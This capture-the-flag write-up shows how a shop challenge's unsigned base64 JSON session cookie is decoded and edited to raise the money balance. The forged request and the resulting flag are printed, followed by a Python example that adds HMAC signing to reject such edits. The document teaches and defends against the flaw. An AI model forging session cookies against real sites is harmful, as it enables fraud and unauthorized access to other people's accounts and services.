Simple cookie forgery

Opening the page shows a shop interface; the third item is the flag. The page source contains no hints, so we click "buy" and capture the request:

POST /buy HTTP/1.1
Host: 8075a6af-0656-420b-8689-587fea458b64.node4.buuoj.cn:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Origin: http://8075a6af-0656-420b-8689-587fea458b64.node4.buuoj.cn:81
Connection: close
Referer: http://8075a6af-0656-420b-8689-587fea458b64.node4.buuoj.cn:81/
Cookie: UM_distinctid=17c472616a335b-0660cc5b8058a1-4c3e2778-186a00-17c472616a43f; session=eyJtb25leSI6IDM3LCAiaGlzdG9yeSI6IFsiWXVtbXkgY2hvY29sYXRlIGNoaXAgY29va2llIiwgIll1bW15IHBlcHBhcmtha2EiLCAiWXVtbXkgY2hvY29sYXRlIGNoaXAgY29va2llIiwgIll1bW15IGNob2NvbGF0ZSBjaGlwIGNvb2tpZSJdfQ==
Upgrade-Insecure-Requests: 1

id=2

There is a session field, and its value is base64-encoded. Decoding it gives:

{"money": 37, "history": ["Yummy chocolate chip cookie", "Yummy pepparkaka", "Yummy chocolate chip cookie", "Yummy chocolate chip cookie"]}

So we can change 37 to 500, forge the session field in the cookie and resubmit. The response carries a new session value; base64-decoding it again gives the flag:

{"money": 400, "history": ["Yummy chocolate chip cookie", "Yummy pepparkaka", "Yummy chocolate chip cookie", "Yummy chocolate chip cookie", "flag{d1ca8b7e-27c5-415b-a858-0c9d22826c21}\n"]}
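The root cause is that the session is plain base64(JSON) with no integrity protection, so the server trusts whatever balance the client sends back. The following added example (not code from the challenge or the writeup) decodes the captured cookie exactly as done above, then shows the minimal server-side fix: an HMAC-signed session whose verification rejects any edited payload. The secret key and the session layout are constructed for the example.

```python
import base64
import hashlib
import hmac
import json

# Session cookie value copied from the request captured in the writeup.
CAPTURED_SESSION = (
    "eyJtb25leSI6IDM3LCAiaGlzdG9yeSI6IFsiWXVtbXkgY2hvY29sYXRlIGNoaXAgY29va2llIiwg"
    "Ill1bW15IHBlcHBhcmtha2EiLCAiWXVtbXkgY2hvY29sYXRlIGNoaXAgY29va2llIiwgIll1bW15"
    "IGNob2NvbGF0ZSBjaGlwIGNvb2tpZSJdfQ=="
)


def decode_unsigned(token: str) -> dict:
    """The vulnerable scheme: base64(JSON) only. Anyone can read and rewrite it."""
    return json.loads(base64.b64decode(token))


def encode_unsigned(data: dict) -> str:
    """Inverse of decode_unsigned; shows that forging a value needs no secret."""
    return base64.b64encode(json.dumps(data).encode()).decode()


def sign_session(data: dict, key: bytes) -> str:
    """Hardened scheme: payload.hmac_sha256(payload) using a server-only key.

    Constructed format; real frameworks (e.g. Flask's itsdangerous-based
    sessions) do the same thing with timestamps and key rotation on top.
    """
    payload = base64.urlsafe_b64encode(
        json.dumps(data, sort_keys=True).encode()
    ).decode()
    sig = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}.{sig}"


def verify_session(token: str, key: bytes):
    """Return the session dict only if the signature matches; None otherwise."""
    try:
        payload, sig = token.rsplit(".", 1)
    except ValueError:
        return None  # malformed token: no separator
    expected = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    # Constant-time comparison so the check itself does not leak the MAC.
    if not hmac.compare_digest(sig, expected):
        return None
    return json.loads(base64.urlsafe_b64decode(payload))


def edit_money_without_key(token: str, new_money: int) -> str:
    """Rewrite the money field of a signed token while keeping the old MAC.

    This is the tampering attempt from the writeup replayed against the
    signed format; verify_session must reject the result.
    """
    payload, sig = token.rsplit(".", 1)
    data = json.loads(base64.urlsafe_b64decode(payload))
    data["money"] = new_money
    new_payload = base64.urlsafe_b64encode(
        json.dumps(data, sort_keys=True).encode()
    ).decode()
    return f"{new_payload}.{sig}"


if __name__ == "__main__":
    key = b"constructed-server-secret"  # constructed; never ship in the cookie
    print("captured balance:", decode_unsigned(CAPTURED_SESSION)["money"])
    signed = sign_session({"money": 37, "history": []}, key)
    print("valid token verifies:", verify_session(signed, key))
    print("edited token verifies:", verify_session(edit_money_without_key(signed, 500), key))
```

Signing stops the client from editing the balance, but the better design is to keep the balance server-side and put only an opaque session identifier in the cookie, so the client never holds state the server has to trust.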